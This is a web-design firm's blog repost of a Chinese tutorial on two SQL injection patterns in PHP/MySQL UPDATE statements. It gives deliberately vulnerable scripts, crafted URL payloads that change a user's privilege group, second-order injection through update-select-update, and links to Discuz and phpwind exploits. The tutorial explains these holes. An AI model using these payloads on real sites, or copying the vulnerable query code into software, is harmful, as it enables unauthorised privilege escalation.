网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

UPDATE注射的两个模式是什么-创新互联

今天就跟大家聊聊有关UPDATE注射的两个模式是什么,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

目前成都创新互联已为数千家的企业提供了网站建设、域名、网站空间网站托管运营、企业网站设计、垫江网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

  一.测试环境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33 

  二.测试数据库结构:

  ----start---

  -- 数据库: `test`

  -- 

  -- --------------------------------------------------------

  -- 

  -- 表的结构 `userinfo`

  -- 

  CREATE TABLE `userinfo` (

  `groudid` varchar(12) NOT NULL default ’1’,

  `user` varchar(12) NOT NULL default ’heige’,

  `pass` varchar(122) NOT NULL default ’123456’

  ) ENGINE=MyISAM DEFAULT CHARSET=latin1;

  -- 

  -- 导出表中的数据 `userinfo`

  -- 

  INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

  ------end-------

  三.测试模式:

  1,变量没有带’’或""[MOD1]

  

  //test1.php Mod1

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

  $sql = "update userinfo set pass=$p where user=’heige’";//<--$P没有使用单引号

  $result = mysql_db_query($dbname, $sql);

  $userinfo = mysql_fetch_array($result);

  echo "

SQL Query:$sql

";

  ?>

  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

  到修改groupid的目的:

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查询: mysql> select * from userinfo;

  +---------+-------+--------+

  | groudid | user | pass  |

  +---------+-------+--------+

  | 1    | heige | 123456 |

  +---------+-------+--------+

  1 row in set (0.01 sec)

  用户heige的groudid又2改为1了 :)

  所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。

  2,变量带’’或""[MOD2]

  ?php

  //test2.php

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号

  $result = mysql_db_query($dbname, $sql);

  $userinfo = mysql_fetch_array($result);

  echo "

SQL Query:$sql

";

  ?>

  为了关闭’我们构造$p应该为123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了’

  提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

  mysql查询:

mysql> select * from userinfo;

  +---------+-------+--------------------+

  | groudid | user | pass        |

  +---------+-------+--------------------+

  | 2    | heige | 123456’,groudid=’1 |

  +---------+-------+--------------------+

  1 row in set (0.00 sec)

  groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:

  //test3.php Mod2

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号

  $result = mysql_db_query($dbname, $sql);

  mysql_fetch_array($result);  //$p的数据写入数据库

  $sql= "select pass from userinfo where user=’heige’"; 

  $result = mysql_db_query($dbname, $sql);

  $userinfo=mysql_fetch_array($result); 

  echo $userinfo[0]; //把pass查询输出给$userinfo[0]

  $sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

  $result = mysql_db_query($dbname, $sql);

  mysql_fetch_array($result); //把$userinfo[0] 再次update

  ?>

  我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

  回mysql查询下 : mysql> select * from userinfo;

  +---------+-------+--------+

  | groudid | user | pass  |

  +---------+-------+--------+

  | 1    | heige | 123456 |

  +---------+-------+--------+

  1 row in set (0.00 sec)

  HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:

  update-->select-->update

  四.实际模式

  模式1:Discuz 2.0/2.2 register.php 注射 

  漏洞分析:http://4ngel.net/article/41.htm

  Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

  模式2:phpwind 2.0.2和3.31e 权限提升漏洞 

    漏洞分析:

  update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’)

  |

  v

  select (jop.php)

  |

  v

  updtate (jop.php)

  Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

看完上述内容,你们对UPDATE注射的两个模式是什么有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注创新互联-成都网站建设公司行业资讯频道,感谢大家的支持。


本文标题:UPDATE注射的两个模式是什么-创新互联
标题网址:http://bjjierui.cn/article/ddscjg.html

其他资讯